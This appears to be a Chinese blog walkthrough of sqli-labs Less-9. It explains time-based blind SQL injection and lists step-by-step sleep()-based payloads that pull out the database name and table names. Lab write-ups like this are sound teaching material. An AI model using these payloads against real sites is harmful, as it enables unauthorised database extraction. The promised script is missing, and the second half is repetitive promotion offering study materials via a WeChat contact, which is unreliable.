SQL注入——sqli-labs-Less-9时间盲注_sqliless9，2024年最新面试宝典

2401_84183070

已于 2024-04-10 11:04:19 修改

阅读量505

点赞数 11

分类专栏： 2024年程序员学习文章标签： sql less 面试

于 2024-04-10 11:04:17 首次发布

本文链接：https://blog.csdn.net/2401_84183070/article/details/137588642

版权

2024年程序员学习专栏收录该内容

60 篇文章 0 订阅

订阅专栏

文末有盲注脚本

一.做题之前

1.什么是时间盲注？

时间盲注，通过时间函数使SQL语句执行时间延长，从页面响应时间判断条件是否正确的一种注入方式。

2.时间盲注常用函数

if(expr1,expr2,expr3)：判断语句，如果第一个语句正确就执行第二个语句，如果错误执行第三个语句
sleep(n) 将程序挂起一段时间 n单位为秒
left(a,b) 从左侧截取a的前b位
substr(a,b,c) 从b位置开始，截取字符串a的c长度
mid(a,b,c) 从位置b开始，截取a字符串的c位
length() 返回字符串的长度
Ascii() 将某个字符转换为ascii值
char() 将ASCII码转换为对应的字符

二.看题

这一关是时间盲注、单引号盲注：

时间盲注，不同于布尔盲注的地方在于，不会进行对错的回显，对所有信息都作统一输出，也就是说我们在盲注时，将更加难以进行判断。

刚刚提到的函数中，sleep函数将帮助到我们，我们根据浏览器是否延时输出了来判断对错：

举例：

if(查询语句,sleep(5),1)

如果查询的语句为假，那么直接输出；如果查询的语句为真，那么过5秒之后输出。

回到题目上来，做这道题时总共分了6步，依次来看：

1.判断数据库的库名长度

?id=1’ and if(length(database())=8,sleep(5),1)–+

从1开始穷举，到=8的时候延迟5秒输出，所以库名长度为8。

2.判断数据库名

测试库名的第一位：

?id=1’ and if(ascii(substr(database(),1,1))=115,sleep(5),1)–+

测得第一位为ASCII编码的115，是字母“s”

测试第二位：

?id=1’and if(ascii(substr(database(),2,1))=101,sleep(5),1)–+

测得第二位是ASCII码101，是字母“e”

依次穷举类推，判断出来数据库名为security，库名长度8位。

接下来第三步是推测数据表，首先是数据表名长度：

3.表名长度

下面这个payload中，x代表是第几个表，y代表表名长度是多少：

?id=1’ and if(length(select table_name from information_schema.tables where table_schema = database() limit x,1)<y,sleep(5),1)–+

下面是security数据库中的第一个表的表名长度：

?id=1’ and if(length((select table_name from information_schema.tables where table_schema = ‘security’ limit 0,1))=6,sleep(5),1)–+

4.推测表名

?id=1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),1)–+

测得第一个表名的第一位是“e”，递推下去得到表名：emails

?id=1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=114,sleep(5),1)–+

然后，第二个表名的第一位是“r”，依此类推得到第二个表名“referers”,第三个“uagens”,第四个“users”

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！

王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。

对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！

【完整版领取方式在文末！！】

93道网络安全面试题

内容实在太多，不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料，给那些想学习网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

1️⃣零基础入门

① 学习路线

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供：

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

-20231025112050764](https://img-blog.csdnimg.cn/874ad4fd3dbe4f6bb3bff17885655014.png#pic_center)

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！
[外链图片转存中…(img-mD938UlA-1712718242392)]